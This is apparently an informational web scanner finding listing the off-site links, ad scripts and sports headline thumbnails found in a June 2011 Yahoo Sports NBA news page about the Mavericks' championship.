href="http://26594.r.msn.com/?ld=4vP5TFjgd4Zn6kmJ_ClbruYWOo9p5X-ol0aNM0y9l5wD__yHi9S9gbrf9ZQzIL9l1nzg_T24mJGRsaXO12GE_MDj-agGvkbUqadKGwBvyn8EmQwYcYd3_EvGSNIjHuftQyr3NLZbSrXokFTnfK5VT66o95b52u2dFPb6tSFrKRsdFKENZpnREZgjlcHd38WvPsdhQ8vMqCvuI3hPu4CnC8iOYlqcSPdtvP_0C7RD_rzSYZXUZfRuHLHG7ZK9NogKAB9lbagkCSy7alHAfn5xjjBiIEpoDfWyG5a9-kamZ9pE01VAlMCb_KRReWUlwvkkK5zCi0KBAmY3M9DlS_nLHGgESR_KCIqfARqHfBG6mwMLMHxJCgzL-MZfo" class="iysmcm-url ysmcm-url yltasis">www.FlowerShopping.com/OklahomaCity</a>
...[SNIP]...
<h4><a href="http://392327.r.msn.com/?ld=4vMHH-I3o3m4sgA-S3HTQp0wmqiw5lf0V4nldf_YGHkY5DakwqWz9zNtigoVwOUsUMGk0Izv7RHQmEVYGiAZprUflwOG8YAS_58pymOm9_XZxUBHdexKEgwq1w4uSYXvTlacQrKmDuKQ4FQPvsZbDqra_oTVpAgBSAzNmqgdinbkZ_yLTgDN15teC57hs0HPXHG0Tbfm5g4djPQvMJBB7PaBnL4nz8EXiXno2MXjACLROuZsu8Gg0B1rhwXe1AA9W3KcHYLa-2HmsXjKYke0GG6zVUCUw2hkOtlS9_0AqMel0x_AE8ECZjcz0Wf8B_djtcamKEaPLL-bq5gVnBoo44-0Nadz0LQgUquw">NFL Apparel</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://392327.r.msn.com/?ld=4vMHH-I3o3m4sgA-S3HTQp0wmqiw5lf0V4nldf_YGHkY5DakwqWz9zNtigoVwOUsUMGk0Izv7RHQmEVYGiAZprUflwOG8YAS_58pymOm9_XZxUBHdexKEgwq1w4uSYXvTlacQrKmDuKQ4FQPvsZbDqra_oTVpAgBSAzNmqgdinbkZ_yLTgDN15teC57hs0HPXHG0Tbfm5g4djPQvMJBB7PaBnL4nz8EXiXno2MXjACLROuZsu8Gg0B1rhwXe1AA9W3KcHYLa-2HmsXjKYke0GG6zVUCUw2hkOtlS9_0AqMel0x_AE8ECZjcz0Wf8B_djtcamKEaPLL-bq5gVnBoo44-0Nadz0LQgUquw">Shop for NFL Apparel. $4.99 3-Day Shipping on All Orders.</a></p><a href="http://392327.r.msn.com/?ld=4vMHH-I3o3m4sgA-S3HTQp0wmqiw5lf0V4nldf_YGHkY5DakwqWz9zNtigoVwOUsUMGk0Izv7RHQmEVYGiAZprUflwOG8YAS_58pymOm9_XZxUBHdexKEgwq1w4uSYXvTlacQrKmDuKQ4FQPvsZbDqra_oTVpAgBSAzNmqgdinbkZ_yLTgDN15teC57hs0HPXHG0Tbfm5g4djPQvMJBB7PaBnL4nz8EXiXno2MXjACLROuZsu8Gg0B1rhwXe1AA9W3KcHYLa-2HmsXjKYke0GG6zVUCUw2hkOtlS9_0AqMel0x_AE8ECZjcz0Wf8B_djtcamKEaPLL-bq5gVnBoo44-0Nadz0LQgUquw" class="iysmcm-url ysmcm-url yltasis">www.FootballFanatics.com</a>
...[SNIP]...
<h4><a href="http://948702.r.msn.com/?ld=4vW3P72OnpowZPtj59RI6QLpqs-uCCNNjbk6ULiGUQS-VvilqU70AHJx5c6s7tKs4D-aYAnDsOiGprSGS6I41ziHIHb7khDLUExec9m2mZE0S0w-XhUAePmg1YH0nMVH-1pJFHekqnMlqNaqjEo79e4Uxj217CXlGL6wVR2ixlKwR4J8FB89xm4Xu2aTO1owuyM-8lmwpET9BoAe5iiH_4QIMU6sE2AVsKlqcaeHTjQSc1VAlMN2xzYxacYL9wWfjtNq9aYhAmY3M96xZhqeQGR_CkdvT8wUh1_YvKhS1VlhdTBgujITBLnhc">Alarming: $25 Car Insuran</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://948702.r.msn.com/?ld=4vW3P72OnpowZPtj59RI6QLpqs-uCCNNjbk6ULiGUQS-VvilqU70AHJx5c6s7tKs4D-aYAnDsOiGprSGS6I41ziHIHb7khDLUExec9m2mZE0S0w-XhUAePmg1YH0nMVH-1pJFHekqnMlqNaqjEo79e4Uxj217CXlGL6wVR2ixlKwR4J8FB89xm4Xu2aTO1owuyM-8lmwpET9BoAe5iiH_4QIMU6sE2AVsKlqcaeHTjQSc1VAlMN2xzYxacYL9wWfjtNq9aYhAmY3M96xZhqeQGR_CkdvT8wUh1_YvKhS1VlhdTBgujITBLnhc">Do Not Buy Car Insurance until you see this shocking report!</a></p><a href="http://948702.r.msn.com/?ld=4vW3P72OnpowZPtj59RI6QLpqs-uCCNNjbk6ULiGUQS-VvilqU70AHJx5c6s7tKs4D-aYAnDsOiGprSGS6I41ziHIHb7khDLUExec9m2mZE0S0w-XhUAePmg1YH0nMVH-1pJFHekqnMlqNaqjEo79e4Uxj217CXlGL6wVR2ixlKwR4J8FB89xm4Xu2aTO1owuyM-8lmwpET9BoAe5iiH_4QIMU6sE2AVsKlqcaeHTjQSc1VAlMN2xzYxacYL9wWfjtNq9aYhAmY3M96xZhqeQGR_CkdvT8wUh1_YvKhS1VlhdTBgujITBLnhc" class="iysmcm-url ysmcm-url yltasis">CarInsurancee-Quotes.com</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=mc-spears_heat_failed_lebron_james_dwyane_wade_061311&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron hate continues">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307948894.jpg?x=94&y=63&xc=43&yc=1&wc=326&hc=219&q=100&sig=Xvl4l0f_TVE.F1uSsI4ZHw--" title="LeBron hate continues" alt="LeBron hate continues" width="94" height="63">
</a>
...[SNIP]...
m/soccer/blog/dirty-tackle/post/Why-goalkeepers-shouldn-8217-t-be-too-quick-to-?urn=sow-wp2377&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Goalie's costly celebration">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/08/goalie.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=TlV8qtCIHSkJYCX8s7qSeg--" title="Goalie's costly celebration" alt="Goalie's costly celebration" width="94" height="63">
</a>
...[SNIP]...
//sports.yahoo.com/nba/news?slug=dw-wetzel_cleveland_laughs_at_lebron_james_061211&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron's failure warms Cleveland hearts">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307947097.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=Ec2FAhGBmbcGt5yb1E1q7A--" title="LeBron's failure warms Cleveland hearts" alt="LeBron's failure warms Cleveland hearts" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ap-nbafinals-markcuban&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Cuban humble after win">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
l_dont_lie/post/Video-Emotional-Dirk-Nowitzki-runs-into-the-loc?urn=nba-wp4846&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Why Dirk Nowitzki left the NBA Finals early">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/d2.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=kZLWzEBuB5OIti.wD3qccQ--" title="Why Dirk Nowitzki left the NBA Finals early" alt="Why Dirk Nowitzki left the NBA Finals early" width="94" height="63">
</a>
...[SNIP]...
all_dont_lie/post/Dallas-downs-the-Heat-takes-home-its-first-NBA-?urn=nba-wp4840&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dallas wins NBA title in decisive fashion">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--" title="Dallas wins NBA title in decisive fashion" alt="Dallas wins NBA title in decisive fashion" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ap-nbafinals-heat&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Still no crown for LeBron">
<img src="http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=94&y=63&xc=3&yc=1&wc=656&hc=440&q=100&sig=attJqgVCcbWX5fJecGk9.A--" title="Still no crown for LeBron" alt="Still no crown for LeBron" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=ys-nba_finals_history_2011&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NBA Finals winners, MVPs">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
s.yahoo.com/nba/blog/ball_dont_lie/post/Video-Mavs-and-Heat-tussle-a-bit-at-midcourt?urn=nba-wp4828&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Tussle mars first half">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--" title="Tussle mars first half" alt="Tussle mars first half" width="94" height="63">
</a>
...[SNIP]...
all_dont_lie/post/Odd-photo-starts-internet-uproar-over-LeBron-82?urn=nba-wp4819&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Photo of LeBron James creates stir on Web">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/lebron-big.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=uIeKaizVW.RdorgryBe0Sg--" title="Photo of LeBron James creates stir on Web" alt="Photo of LeBron James creates stir on Web" width="94" height="63">
</a>
...[SNIP]...
shutdown_corner/post/Tom-Brady-8217-s-mentor-given-one-month-to-live?urn=nfl-wp2566&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Sad health news for Tom Brady's mentor">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/brady.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=6Px4mV9VHyfgCJ68lZsJXA--" title="Sad health news for Tom Brady's mentor" alt="Sad health news for Tom Brady's mentor" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-dolphins-marshall&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="NFL star's wife in jail">
<img src="http://d.yimg.com/a/p/sp/getty/74/fullj.be3dd8e493d12661a6c3c69da6bd27b7/be3dd8e493d12661a6c3c69da6bd27b7-getty-_dolphin.jpg?x=94&y=63&xc=1&yc=1&wc=660&hc=442&q=100&sig=SLg3JcDSSPtWv01t0JhaVw--" title="NFL star's wife in jail" alt="NFL star's wife in jail" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-eagles-vick-graduation&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Vick surprises 2 grads with scholarships">
<img src="http://d.yimg.com/a/p/sp/ap/5e/fullj.261e7f944cfd25545b56930f1a2c06f3/ap-201106081242457246066.jpg?x=94&y=63&xc=1&yc=1&wc=349&hc=233&q=100&sig=DQRWzZOA498_5jeJ8SOypQ--" title="Vick surprises 2 grads with scholarships" alt="Vick surprises 2 grads with scholarships" width="94" height="63">
</a>
...[SNIP]...
irty-tackle/post/Eric-Hassli-scores-the-MLS-goal-of-the-season-so?urn=sow-wp2446&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Is this the best soccer goal of the year?">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/goal.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=ljrQeiwcSj_mrmcVg4ATtg--" title="Is this the best soccer goal of the year?" alt="Is this the best soccer goal of the year?" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/sow/news?slug=ro-rogers_gold_cup_panama_defeats_usa_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="U.S. team's ugly loss">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307858429.jpg?x=94&y=63&xc=1&yc=1&wc=200&hc=134&q=100&sig=XyvTu0c9VsrVHGCR3997bA--" title="U.S. team's ugly loss" alt="U.S. team's ugly loss" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/sow/news?slug=ap-mexico-playerssuspended&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Mexico's soccer scandal">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/golf_experts/post/Tiger-Woods-8217-caddie-on-Adam-Scott-8217-s-?urn=golf-wp2533&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="New gig for Tiger Woods's longtime caddie">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/10/tiger1.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=dIURv6ZGoyUZZmWzhyuzVg--" title="New gig for Tiger Woods's longtime caddie" alt="New gig for Tiger Woods's longtime caddie" width="94" height="63">
</a>
...[SNIP]...
.com/golf/blog/golf_experts/post/Monty-predicts-Europeans-are-about-to-dominate-t?urn=golf-wp2535&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Golfer's bold prediction">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nba/news?slug=jy-ludden_dirk_nowitzki_nba_finals_coughing_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dirk fires back at Mavs">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307855496.jpg?x=94&y=63&xc=1&yc=1&wc=180&hc=120&q=100&sig=fBEIDS2ocjb7Na3dci2q1w--" title="Dirk fires back at Mavs" alt="Dirk fires back at Mavs" width="94" height="63">
</a>
...[SNIP]...
tp://sports.yahoo.com/nba/news?slug=aw-wojnarowski_lebron_james_dwyane_wade_nba_finals_game6_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="LeBron coughing it up?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
http://sports.yahoo.com/mma/news?slug=ki-iole_ufc131_dos_santos_beats_carwin_061111&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Dos Santos dominates Carwin at UFC 131">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307852871.jpg?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=pSs3IwCg5jz8cCv94n_7Qw--" title="Dos Santos dominates Carwin at UFC 131" alt="Dos Santos dominates Carwin at UFC 131" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mma/news?slug=ys-ufc131_shane_carwin_blog_060911&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Carwin's pre-fight blog">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307722364.gif?x=94&y=63&xc=1&yc=1&wc=220&hc=147&q=100&sig=WMd9OccAwMTzQnWUVZpv5g--" title="Carwin's pre-fight blog" alt="Carwin's pre-fight blog" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mma/news?slug=mmajunkie-Spike_TV_TUF_14&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="'TUF 14' to feature 32">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
s.yahoo.com/mma/blog/cagewriter/post/Stout-scores-possible-KO-of-Year-on-Edwards-at-U?urn=mma-wp3402&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Knockout of the year?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/shutdown_corner/post/Former-Cowboys-linebacker-Godfrey-Myles-dies-at-?urn=nfl-wp2552&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Ex-Cowboys player Godfrey Myles dies">
<img src="http://l.yimg.com/a/i/ww/news/2011/06/11/godfrey-ipad.jpg?x=94&y=63&xc=215&yc=1&wc=596&hc=400&q=100&sig=KiIps_4zc5vJdVb5T8ZL8g--" title="Ex-Cowboys player Godfrey Myles dies" alt="Ex-Cowboys player Godfrey Myles dies" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=pfw-20110609_lockout_limbo_redskins_report&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Redskins' QB questions">
<img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307677853.jpg?x=94&y=63&xc=13&yc=1&wc=350&hc=235&q=100&sig=_7Ph44gxlCqLT7uQYXoBQg--" title="Redskins' QB questions" alt="Redskins' QB questions" width="94" height="63">
</a>
...[SNIP]...
<a href="http://rivals.yahoo.com/ncaaf/news?slug=rivals-1230071&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Who won '04 NCAA title?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<div id="ad-579434" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541"> </script>
...[SNIP]...
<div id="ad-436894" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541"> </script>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AmSBOZDJi1_b83sbwQdsGnfTjdIF/SIG=11h49uf09/EXP=1309172674/**http%3A//www.mavsmoneyball.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/af/afb7a05bacb4dc1f3b0ee9ea39f1efc2/nbadal.gif" alt="SB Nation" />Mavs Moneyball</a>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AhiU6TnXGdlBQdWEdkk7WmLTjdIF/SIG=11n7as36p/EXP=1309172674/**http%3A//www.silverscreenandroll.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/66/66ed4c090d435ded86878f05b9320df7/nbalal.jpg" alt="SB Nation" />Silver Screen and Roll</a>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=AhrhZzpfExye8OGFipTyZ.nTjdIF/SIG=11n6tbioa/EXP=1309172674/**http%3A//www.peninsulaismightier.com/" ><img src="http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg" alt="SB Nation" />Peninsula is Mightier</a>
...[SNIP]...
/blog/ball_dont_lie/post/Video-Emotional-Dirk-Nowitzki-runs-off-court-ri;_ylt=AmX2akW77R0QvvnE7cz5YQzTjdIF?urn=nba-wp4846" title="Video: Emotional Dirk Nowitzki runs off court right before Finals win"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/06/ipt/1307938675.jpg" class="thumb" /></a>
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/turnersports/18542/124828121.jpg" width="92px" height="69px" alt="Sunday's Top 5" />
    <a href="http://sports.yahoo.com/video/player/nba/25586922;_ylt=AtQ5bPhcFOJ9gNusHlFa_q_TjdIF" >
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/cbslocal/18565/124828263.jpg" width="92px" height="69px" alt="Mavs Fans Celebrate NBA Championship In Miami" />
    <a href="http://sports.yahoo.com/video/player/nba/25586963;_ylt=AgC_xkuebiDrnifhnDhCB6rTjdIF" >
...[SNIP]...
<div class="thumb">
<img src="http://l.yimg.com/a/p/i/bcst/turnersports/18542/124827592.jpg" width="92px" height="69px" alt="Dunk of the Night" />
    <a href="http://sports.yahoo.com/video/player/nba/25586790;_ylt=AuHNfLJeYcC4K55MmQ49fwDTjdIF" >
...[SNIP]...
<div id="ad-441055" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"> <script type="text/javascript" src="http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307963074600541&transactionID=1307963074600541"> </script>
...[SNIP]...

<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js"></script>
...[SNIP]...
</div>

<iframe src="http://data.nba.com/data/html/gdyn/gdyn_nba.html" width=1 height=2 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no style="display:block;height:0;"></iframe>
</div>
</div>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/video/dash-players/yep-player.r169686;js/video/dash-players/dash-players.r170778;js/video/dash-players/dash-players-init.r172129.js?m"></script>

<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/answers_badge_1.5.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128c4n592(gid$b8WRZUwNdHHm3NorTdAdCwBDrcHW80317sIABdTj,st$1307963074476285,v$1.0))&t=J-D"></noscript>
...[SNIP]...

18.206. http://sports.yahoo.com/nba/news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sports.yahoo.com
Path:	/nba/news

Issue detail

The page was loaded from a URL containing a query string:

http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311

The response contains the following links to other domains:

http://154875.r.msn.com/?ld=4vkTsjzBFcOh8SDKBlpA6B-kMY1zI5C3oWaUUHMF-Gz9a6crz6s2sOi9TKYPIdsH2QRRBwOMIilOUqojSKPDxh5Xz1nXZ3N14WKwJOnV2wOLFJdKfqVOUnpwCLEh-cBa75dEOPta8hzgetBQPWVJVs1ZT_AMZ91bd4kTbIhiu7MuMttRK86N8LxxskgvTIS2dVyZFRdt-qxrilPCGJmp3Jyoyqu2ozAQFvlYtyqxtxMyddCRtSftWYb3SSfDligFYCnc1lGk70--KCTl_BqfXfpTVUCUxr-9XR8Cw109BwZwQOR9vCECZjcz3l6aIfZjQ4PBaxxcmAwucQ77_ZdhVBTaTVHW3fKqfQ_Q
http://26594.r.msn.com/?ld=4v26U3wpV9QLcOJeqZp9VE9F7iE_JGuHAEqSYJ5C1_a5njEtel9Ryw2d6BESW4mTQd4CSbIc-zUfYLR-_ohQHfiTatmAxe9oWOvYSRYsRfi3mTYSv8AdkqI7g8oLvmfVVgHxY1EtR5mHDAsGdvSp4cjCZ1yXcEXz7rYprlM_9Nw2XhJLA9X5oJ0CQS3dZnn7AZBrGZVDiTgQVquUQgn9K3Do6koy47SY23E1LgF8e2OZBefyZDa7PR8K2s89E4znWnOOXhCpJ8WGTGDi8NXlFtvIjs2TmG7OewyJxoybbKU3k1VAlMuq85LMo_g-5nMUQ3HWlkQxAmY3M9l5Zzfa0Gqi-dTqrzigHjvFpFTtYlruI1gSpLRStJ7n0
http://948702.r.msn.com/?ld=4vLhX0f9-KQKXhGdGjfYVTxU062QBxZUmcfu1d4qru6k8Pb0lNsnoIaJNb89P4iTA-cPsd1cBemBe0MRh8SZyqJsrU4wHcAyOJXp5wX1VsPIqTc_k4wnFl8gKYLAGRVGUf1YKXzIQFfuRG5ykEgQVkAgVt7HL-pOx3ncPl1_Hvlyjxf-IpyWdLvBm4udicLRKUv-0XF31O_sHYxSsypkWFIpCsiqHAvyt_6U2aMm48M-c1VAlM3A1YN7mn6na-sOSH2ey76BAmY3M91lkrBjFwr8mAK8OuyYN-Mqrsakx_0gXBOG2d7bRSBws
http://ad.yieldmanager.com/pixel?id=117617&t=2
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon1&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.nba.com/js.ng/site=ynba&ynba_pos=148x34_spon2&ynba_rollup=homepage&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.nba.com/js.ng/site=ynba&ynba_pos=160x600_bot&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.nba.com/js.ng/site=ynba&ynba_pos=300x250_rgt&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.nba.com/js.ng/site=ynba&ynba_pos=954x60_spon&ynba_rollup=news&page.allowcompete=yes&tile=1307962853703487&transactionID=1307962853703487
http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg
http://amch.questionmarket.com/adsc/d692902/3/695561/randm.js
http://bit.ly/lhnZPc
http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128f3el5i(gid$SSzZZEwNdHHm3NorTdAdCwM8rcHW80317eUAB.4z,st$1307962853607094,v$1.0))&t=J-D
http://d.yimg.com/a/p/sp/ap/5e/fullj.261e7f944cfd25545b56930f1a2c06f3/ap-201106081242457246066.jpg?x=94&y=63&xc=1&yc=1&wc=349&hc=233&q=100&sig=DQRWzZOA498_5jeJ8SOypQ--
http://d.yimg.com/a/p/sp/ap/99/fullj.8f741bf99581b1f598f4bbd0ccac4f13/ap-201105301352499683518.jpg?x=198&y=136&xc=44&yc=1&wc=353&hc=243&q=100&sig=E7mAhtCIVwOCNe2DzFMJTA--
http://d.yimg.com/a/p/sp/getty/74/fullj.be3dd8e493d12661a6c3c69da6bd27b7/be3dd8e493d12661a6c3c69da6bd27b7-getty-_dolphin.jpg?x=94&y=63&xc=1&yc=1&wc=660&hc=442&q=100&sig=SLg3JcDSSPtWv01t0JhaVw--
http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=198&y=136&xc=11&yc=1&wc=640&hc=440&q=100&sig=4Wg8UWZyVI3MM3XRtxqJOA--
http://d.yimg.com/a/p/sp/getty/9f/fullj.f3465156c4a1d8a9bd40907a552f9ac1/f3465156c4a1d8a9bd40907a552f9ac1-getty-114832789mw134_dallas_maver.jpg?x=94&y=63&xc=3&yc=1&wc=656&hc=440&q=100&sig=attJqgVCcbWX5fJecGk9.A--
http://d.yimg.com/nl/yahoo%20sports/site/player.swf
http://data.nba.com/data/html/gdyn/gdyn_nba.html
http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&title=Perseverance+pays+off+for+Nowitzki%2C+Mavs&ts=1307962853
http://l.yimg.com/a/i/us/sp/ed/experts/wojnarowski.png
http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png
http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png
http://l.yimg.com/a/i/ww/news/2011/06/08/goalie.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=TlV8qtCIHSkJYCX8s7qSeg--
http://l.yimg.com/a/i/ww/news/2011/06/10/brady.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=6Px4mV9VHyfgCJ68lZsJXA--
http://l.yimg.com/a/i/ww/news/2011/06/10/d2.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=kZLWzEBuB5OIti.wD3qccQ--
http://l.yimg.com/a/i/ww/news/2011/06/10/goal.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=ljrQeiwcSj_mrmcVg4ATtg--
http://l.yimg.com/a/i/ww/news/2011/06/10/lebron-big.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=uIeKaizVW.RdorgryBe0Sg--
http://l.yimg.com/a/i/ww/news/2011/06/10/mavs.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=u5SPXj_CUd8f7TwwUIjXZQ--
http://l.yimg.com/a/i/ww/news/2011/06/10/tiger1.jpg?x=94&y=63&xc=82&yc=1&wc=229&hc=154&q=100&sig=dIURv6ZGoyUZZmWzhyuzVg--
http://l.yimg.com/a/i/ww/news/2011/06/11/godfrey-ipad.jpg?x=94&y=63&xc=215&yc=1&wc=596&hc=400&q=100&sig=KiIps_4zc5vJdVb5T8ZL8g--
http://l.yimg.com/a/p/i/bcst/cbslocal/18565/124828263.jpg
http://l.yimg.com/a/p/i/bcst/turnersports/18542/124827592.jpg
http://l.yimg.com/a/p/i/bcst/turnersports/18542/124828121.jpg
http://l.yimg.com/a/p/sp/editorial_image/66/66ed4c090d435ded86878f05b9320df7/nbalal.jpg
http://l.yimg.com/a/p/sp/editorial_image/af/afb7a05bacb4dc1f3b0ee9ea39f1efc2/nbadal.gif
http://l.yimg.com/a/p/sp/editorial_image/d4/d4f4977a4af580e2188d0b9454605942/nbamia.jpg
http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1306711597.jpg
